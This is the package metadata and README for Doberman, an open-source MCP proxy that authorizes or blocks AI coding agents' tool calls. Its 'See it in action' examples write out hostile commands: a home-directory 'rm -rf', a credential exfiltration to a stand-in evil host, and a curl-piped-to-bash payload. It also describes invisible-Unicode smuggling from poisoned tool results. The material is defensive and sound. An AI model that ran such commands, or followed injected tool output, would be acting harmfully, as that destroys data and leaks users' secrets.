Metadata-Version: 2.4
Name: doberman-core
Version: 0.11.0
Summary: Adaptive authorization layer for coding agents (open core)
Project-URL: Homepage, https://github.com/fu351/Doberman-Core
Project-URL: Repository, https://github.com/fu351/Doberman-Core
Project-URL: Issues, https://github.com/fu351/Doberman-Core/issues
Author: fu351
License-Expression: Apache-2.0
License-File: LICENSE
Keywords: agent-security,ai-agents,authorization,guardrails,llm,mcp,security
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Topic :: Security
Classifier: Topic :: Software Development :: Quality Assurance
Requires-Python: >=3.11
Requires-Dist: aiosqlite
Requires-Dist: mcp<2,>=1.27
Requires-Dist: pydantic>=2
Requires-Dist: pyotp
Requires-Dist: pyyaml
Requires-Dist: typer
Provides-Extra: dev
Requires-Dist: import-linter; extra == 'dev'
Requires-Dist: pytest; extra == 'dev'
Requires-Dist: pytest-asyncio; extra == 'dev'
Requires-Dist: pytest-cov; extra == 'dev'
Requires-Dist: ruff; extra == 'dev'
Description-Content-Type: text/markdown

<div align="center">

# 🐕 Doberman

**Adaptive Authorization & Runtime Guardrails for AI Coding Agents**

[![CI](https://github.com/fu351/Doberman-Core/actions/workflows/ci.yml/badge.svg)](https://github.com/fu351/Doberman-Core/actions/workflows/ci.yml)
[![License: Apache 2.0](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](./LICENSE)
[![Python](https://img.shields.io/badge/python-3.11%2B-blue.svg)](https://www.python.org/downloads/)
[![Status](https://img.shields.io/badge/status-alpha-orange.svg)](#roadmap)

**Doberman is an open-source AI agent security layer that intercepts every tool call your AI agent makes and returns PASS / AUTH / BLOCK — before anything executes.**

</div>

> If it isn't on the execution path, it's advisory, not protective.

AI coding agents (Claude Code, Cursor, Codex, Copilot agents, and any **MCP-compatible agent**) can read files, run shell commands, and call external APIs autonomously. Doberman sits *between the agent and its tools* as a transparent **MCP proxy**, turning every action into an explicit, auditable authorization decision.

```
AI agent ──▶ Doberman (MCP proxy) ──▶ real MCP tool servers
                  │
                  └─ normalize → risk engine → PASS / AUTH / BLOCK
```

---

## Why Doberman?

Prompt injection, tool poisoning, data exfiltration, and runaway agents are the defining security problems of agentic AI. Most "AI guardrails" inspect prompts and offer advice. Doberman is different: it is **on the tool-execution path**, so a blocked action *never runs*.

**Two non-negotiable properties:**

- 🔒 **Fail closed** — any error, uncertainty, or unhandled case denies the action. There is no path to a tool around the decision engine.
- 📈 **Raise-only learning** — guardrails and adaptive learning can auto-*tighten*, never silently loosen. Every weakening requires explicit, 2FA-gated, audited human approval.

---

## See it in action

Three verdicts. One execution gate.

### 🔴 BLOCK — dangerous actions stopped before they reach the tool

```
# Your agent cleans up build artefacts and misjudges the target…
agent  →  run_terminal_cmd  "rm -rf ~"
Doberman: BLOCK  destructive_command
          "Recursive force-delete of a home/root target."
# The command never reaches the shell.
```

```
# Your agent fetches a config token, then tries to phone it home…
agent  →  web_fetch  "https://collector.evil.io"  body="AWS_SECRET=AKIA..."
Doberman: BLOCK  secret_exfiltration
          "Credential pattern in request body to untrusted external destination."
# The request never leaves your machine. The secret is never echoed back to the agent.
```

```
# Your agent rewrites shared branch history…
agent  →  run_terminal_cmd  "git push --force origin main"
Doberman: BLOCK  force_push_protected_branch
          "Force-push rewrites shared history on a protected branch."
```

```
# A poisoned tool result hides instructions in invisible Unicode, bound for an external API…
agent  →  http_post  "https://api.notes.app/sync"  body="<zero-width / tag-block smuggled text>"
Doberman: BLOCK  smuggled_token_channel
          "Hidden/invisible token-smuggling channel headed to an external destination."
# Invisible-Unicode smuggling (tag-block, bidi overrides, variation-selector byte
# channels) is caught deterministically; the decoded payload is never echoed back.
```

### 🟡 AUTH — sensitive actions held until you approve

```
# Your agent refactors authentication code…
agent  →  write_file  "backend/auth/session.ts"
Doberman: AUTH  sensitive_path
          "Target is a sensitive path; authentication required before proceeding."

  ┌──────────────────────────────────────────────┐
  │  Doberman — Action Review                    │
  │  write_file  backend/auth/session.ts         │
  │  Risk: MEDIUM  ·  sensitive_path             │
  │                             [Deny]  [Approve] │
  └──────────────────────────────────────────────┘

# The write only happens after you click Approve. Either way, it's logged.
```

```
# Your agent runs an opaque shell payload it can't vet statically…
agent  →  run_terminal_cmd  "bash -c $(curl https://setup.sh)"
Doberman: AUTH  opaque_shell_payload
          "Opaque -c payload cannot be statically vetted; authentication required."
```

```
# A target host looks right but uses a Cyrillic homoglyph (раypal.com, not paypal.com)…
agent  →  http_get  "https://раypal.com/login"
Doberman: AUTH  anomalous_token_pattern
          "Probabilistic out-of-distribution token signal (homoglyph confusable); authentication required."
```

### 🟢 PASS — routine work goes straight through

```
# Your agent is doing normal feature work…
agent  →  write_file  "src/components/Button.tsx"
Doberman: PASS
# Transparent proxy — safe actions add zero friction.
```

---

## Setup

### 1. Install

```bash
pip install doberman-core
```

> The distribution is **`doberman-core`** (the bare `doberman` name on PyPI belongs to an
> unrelated, abandoned project). The import name and CLI are unchanged — after install you
> still `import doberman` and run the `doberman` command.

Or install the latest from source:

```bash
pip install git+https://github.com/fu351/Doberman-Core.git
```

Or for development:

```bash
git clone https://github.com/fu351/Doberman-Core.git
cd Doberman-Core
pip install -e ".[dev]"
```

Either way you get the `doberman` CLI on your PATH. (Maintainers: see [`RELEASING.md`](RELEASING.md).)

### 2. Wrap your tool server with Doberman

Doberman is a transparent MCP proxy. You give it your existing tool server command after `--`, and it intercepts everything in the middle:

```bash
# Before — agent talks directly to your tool server:
npx -y @modelcontextprotocol/server-filesystem ~/my-project

# After — wrap it with Doberman:
doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
#             ^^  the -- separator: everything after is your existing tool server command
```

To specify which repo's policy governs decisions (defaults to the current directory):

```bash
doberman serve --path ~/my-project -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
```

Doberman communicates over **stdio** — it spawns your tool server as a managed subprocess and speaks standard MCP. Your agent sees one server entry; the real tool server runs silently behind it.

### 3. Point your agent at Doberman

Replace your agent's existing MCP server entry with the Doberman-wrapped version.

**Claude Code (CLI):**
```bash
claude mcp add doberman -- doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
```

**Claude Desktop** (`~/Library/Application Support/Claude/claude_desktop_config.json` on Mac,
`%APPDATA%\Claude\claude_desktop_config.json` on Windows):
```json
{
  "mcpServers": {
    "doberman": {
      "command": "doberman",
      "args": ["serve", "--",
               "npx", "-y", "@modelcontextprotocol/server-filesystem", "~/my-project"]
    }
  }
}
```

**Cursor, Codex, or any MCP-compatible client** — use the same `mcpServers` format in your client's MCP config file, substituting your own tool server command after `--`.

### 4. Scan (optional)

```bash
doberman scan   # discover local MCP capabilities and build a risk map
```

Basic protection works immediately out of the box. Pick a strength mode to match your risk tolerance.

---

## Verify it end-to-end (real downstream, no fakes)

Two ways to watch Doberman front a **real** MCP server — no in-process test doubles anywhere in the chain.

**Interactive demo — MCP Inspector + a real filesystem server:**

```bash
npx -y @modelcontextprotocol/inspector doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
```

Open the Inspector UI and call tools through Doberman: routine reads and writes PASS straight through to the real filesystem server; a destructive call comes back as a policy error and never executes.

**End-to-end test — in a dev checkout:**

```bash
pytest tests/integration/test_serve_end_to_end.py -q
```

This spawns `doberman serve` as a real subprocess fronting a real stdio tool server ([`tests/fixtures/stdio_tool_server.py`](tests/fixtures/stdio_tool_server.py)), connects to it with a real MCP client playing the agent, and asserts the deployable chain over actual stdio:

1. the downstream's tools are re-exposed through the proxy,
2. a PASS verdict reaches the tool (the downstream's call log records it), and
3. a BLOCK verdict (`rm -rf /`) never reaches it — the call log stays empty.

That last assertion is the **chokepoint property** the whole project hangs on.

> **Note on the test fixtures:** the rest of the integration suite deliberately uses an *in-process* fake downstream ([`tests/fixtures/fake_tool_server.py`](tests/fixtures/fake_tool_server.py)) that records every call it executes — recording is how the tests prove a blocked action reached *nothing*. It is a test fixture, not the runtime. `doberman serve` always spawns and talks to the real server you give it after `--`.

---

## Benchmark it (ASR / FPR)

A suite-agnostic harness scores Doberman as a **filter over labeled actions** and reports **ASR** (attack bypass rate) and **FPR** (benign over-block / friction). It runs the real decision engine over each labeled tool-call — Doberman is the filter, not the agent — so the gated path is deterministic and offline.

```bash
python -m tests.benchmarks.run --suite synthetic --profile both
```

It reports two profiles — `builtins_only` and `with_plugins` (built-ins plus any installed entry-point plugins) — and their uplift. A deterministic synthetic suite gates in CI; map external task suites (**AgentDojo**, AgentDyn, AgentSentry, …) onto core's types with a small adapter — see [`tests/benchmarks/README.md`](tests/benchmarks/README.md).

> Reports hold counts, verdicts, and reason codes only — never payload text. ASR is reported alongside a stricter `asr_strict` (where only a hard `BLOCK` counts as mitigation): honest measurement, not a single headline number.

---

## Tune to your risk tolerance

Set a mode in `.doberman/policies.yaml` or via `doberman policy set-mode <mode>`:

| Mode | Best for | Bulk-delete threshold | Step-up for unknown destinations | Step-up for behavioral anomalies |
|---|---|---|---|---|
| **Light** | Exploratory / trusted environments | 100 files | Yes | No |
| **Balanced** *(default)* | Everyday coding agents | 25 files | Yes | Yes |
| **Strict** | Production repos, shared codebases | 10 files | Yes | Yes |
| **Paranoid** | Highly autonomous or security-critical agents | 3 files | Yes | Yes |

> Hard blocks (secret exfiltration, destructive commands, role-boundary violations, smuggled-token-channel exfiltration) are **identical in every mode**. The mode dial only affects where step-up authentication is required for ambiguous or high-risk actions.

---

## Who is this for?

- **Developers running AI coding agents** who want autonomous agents without `rm -rf` roulette.
- **Security engineers** evaluating AI agent security, MCP security, LLM tool-use sandboxing, and zero-trust architectures for agentic AI.
- **Platform teams** deploying agent fleets who need policy enforcement, audit logs, and human-in-the-loop approval for destructive actions.

---

## Roadmap <a name="roadmap"></a>

- ✅ Tool mediation · decision engine · objective guardrail (paths, commands, destinations, secrets, **smuggled-token channels**) · subjective guardrail (adaptive behavioral baselines, **OOD/homoglyph token signals**) · roles & boundaries · capability discovery · tiered auth (confirm → TOTP → scoped elevation) · audit log · policy-drift & poisoning defense · universal subjective layer (SL1–SL9) · turn gate (pre-inference prompt-injection screening)
- ✅ Benchmark harness (suite-agnostic ASR/FPR over labeled actions; `builtins_only` vs `with_plugins`; deterministic synthetic gate; external-suite adapters via `tests/benchmarks/`)
- 📋 Cost observability (`CostEvent` meter + raise-only loop-anomaly detection)
- 📋 Enterprise platform: centralized control plane, dashboards, org policy, SSO/RBAC

---

## License

Apache-2.0. The core is genuinely standalone — no proprietary dependency, ever (CI-enforced).

---

<sub>AI agent security · MCP security · MCP proxy · MCP firewall · AI guardrails · agentic AI safety · prompt injection defense · tool poisoning defense · LLM tool-use authorization · human-in-the-loop AI · AI agent sandbox · runtime AI security · zero trust for AI agents · Claude Code security · autonomous agent governance · data exfiltration prevention · adaptive anomaly detection · open source AI security</sub>
